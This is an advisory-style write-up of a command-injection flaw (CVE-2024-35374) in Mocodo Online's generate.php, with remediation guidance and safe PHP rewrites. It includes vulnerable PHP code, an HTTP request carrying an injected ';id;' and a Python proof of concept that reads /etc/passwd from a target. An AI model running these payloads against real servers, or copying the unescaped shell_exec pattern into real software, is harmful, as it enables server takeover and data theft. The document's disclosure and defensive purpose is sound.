CVE-2024-35374 - Remote Code Execution in Mocodo Online via Unsanitized `sql_case` Input
A critical security vulnerability, CVE-2024-35374, has been identified in Mocodo Online, affecting version 4.2.6 and below. The flaw allows remote code execution (RCE): the /web/generate.php endpoint passes the sql_case form field into a shell command without sanitization, so an attacker can append their own commands. Because the injected commands run with the privileges of the web server process, this can lead to full server compromise.
If you are running Mocodo Online up to v4.2.6, update immediately or apply strict mitigations.
What is Mocodo?
Mocodo is an open-source tool for creating and converting Entity-Relationship diagrams, especially aimed at database design. The online demo, Mocodo Online, is popular in classrooms, but when deployed in production or accessible on the public internet, it’s prone to abuse if left unpatched.
Where’s the problem?
Mocodo Online contains a PHP script, /web/generate.php, that handles user input for generating SQL code from diagrams. Among its form fields is sql_case, which the program uses without sanitization or escaping.
An attacker can send specially crafted sql_case input, injecting commands that the backend will process, leading to code execution on the server.
Let's look at a simplified version of the vulnerable PHP code (modelled on /web/generate.php):
<?php
// Simulated part of the code: the form field is taken verbatim from the request.
$sql_case = $_POST['sql_case'];
// Interpolated into a shell command string without escaping or validation.
// shell_exec() hands this string to /bin/sh, which honours ';', '|', '$(...)' etc.
$command = "python3 generate_sql.py --case=$sql_case <other options>";
$output = shell_exec($command);
echo $output;
?>
The problem is the direct insertion of $sql_case into the command line, which makes it trivial to inject system commands.
With Burp Suite or curl, an attacker can supply:
POST /web/generate.php HTTP/1.1
Host: mocodo.target
Content-Type: application/x-www-form-urlencoded

sql_case=;id;
Resulting system command:
python3 generate_sql.py --case=;id; <other options>
The shell treats each ';' as a command separator, so after the Python invocation it runs id as the web server user (www-data or similar). Any other command can take its place.
Here is a simple Python PoC that demonstrates the RCE in a vulnerable deployment:
import requests

url = "http://mocodo.target/web/generate.php"
data = {
    "sql_case": ";cat /etc/passwd;",  # Replace with your payload
    # ... add other required form fields as needed
}
# The injected command runs server-side; its output comes back in the HTTP body.
response = requests.post(url, data=data, timeout=10)
print(response.text)
If vulnerable, you will see the contents of /etc/passwd in the response.
References
- Original Advisory on GitHub
- NVD Listing
- Mocodo Official Repo
- Common command injection exploitation tutorial (PortSwigger)
Mitigations
Upgrade to the latest version. If you cannot, consider:
1. Restricting access to /web/generate.php (authentication, an IP allow-list, or removing the online demo from any production host).
2. Never using unsanitized user input in system commands:
- Validate the value against an allow-list of the options the generator actually accepts.
- Use escapeshellarg() on each argument; escapeshellcmd() alone does not stop an attacker from smuggling in extra arguments.
- Preferably, switch to process functions that accept an argv array rather than a command string (proc_open() since PHP 7.4), so no shell is involved at all.
Example Safe PHP Code
$sql_case = $_POST['sql_case'] ?? '';
// Allow-list: only values the generator understands get anywhere near a command.
// The third argument (strict) prevents loose-comparison surprises such as 0 == 'upper'.
$allowed_cases = ['upper', 'lower', 'capitalize'];
if (!is_string($sql_case) || !in_array($sql_case, $allowed_cases, true)) {
    die("Invalid case option.");
}
// Defense in depth: escapeshellarg() single-quotes the argument, so even a value
// that slipped past the allow-list could not terminate the command.
$command = "python3 generate_sql.py --case=" . escapeshellarg($sql_case);
$output = shell_exec($command);
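The allow-list fix above still hands a string to /bin/sh. The following is an added example, not Mocodo's code, of the same handler rewritten to launch python3 directly with an argv array through proc_open() (PHP 7.4 and later), which is the shell-free option recommended under Mitigations. The generate_sql.py script, its --case option and the three accepted values are carried over from the simplified snippets on this page and are assumptions, not the real project's interface.

```php
<?php
// Added example (not Mocodo's code): shell-free handler for the sql_case field.
// Assumption: generate_sql.py accepts --case=<value> with the three values below.
declare(strict_types=1);

const ALLOWED_CASES = ['upper', 'lower', 'capitalize'];

/**
 * Validate sql_case against the allow-list. Returns the value or null.
 * A non-string (PHP decodes sql_case[]=x into an array) is rejected outright,
 * and strict in_array() avoids loose-comparison surprises.
 */
function validate_sql_case($value): ?string
{
    if (!is_string($value)) {
        return null;
    }
    return in_array($value, ALLOWED_CASES, true) ? $value : null;
}

/**
 * Run the generator with an argv array. Given an array, proc_open() executes
 * python3 directly instead of via /bin/sh, so ';', '|', '$(' and friends in
 * any argument are inert: they reach Python's sys.argv as literal characters.
 */
function run_generator(string $case): string
{
    $argv = ['python3', 'generate_sql.py', '--case=' . $case];
    $spec = [
        0 => ['pipe', 'r'],   // child's stdin
        1 => ['pipe', 'w'],   // child's stdout, captured below
        // descriptor 2 is not listed, so stderr is inherited and lands in the
        // web server's error log rather than in the HTTP response
    ];
    $proc = proc_open($argv, $spec, $pipes, __DIR__);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start generator');
    }
    fclose($pipes[0]);
    $stdout = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $status = proc_close($proc);
    if ($status !== 0) {
        throw new RuntimeException("generator exited with status $status");
    }
    return $stdout;
}

$case = validate_sql_case($_POST['sql_case'] ?? null);
if ($case === null) {
    http_response_code(400);
    exit('Invalid case option.');
}
header('Content-Type: text/plain; charset=utf-8');
echo run_generator($case);
```

With the array form there is no command string to inject into, so the allow-list is the only check that matters for correctness; keeping it still limits the generator to inputs it was written for. If the real generator prints diagnostics on stderr that you need to show the user, capture descriptor 2 as well, but read both pipes with stream_select() or non-blocking streams so a chatty child cannot block on a full pipe.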
Summary
CVE-2024-35374 in Mocodo Online (v4.2.6 and below) is a serious security bug allowing remote attackers to run arbitrary commands and potentially take over your server. Patch now, validate all user input, and always be cautious when handling inputs that end up in system commands.
Timeline
Published on: 05/24/2024 21:15:59 UTC
Last modified on: 08/20/2024 15:35:14 UTC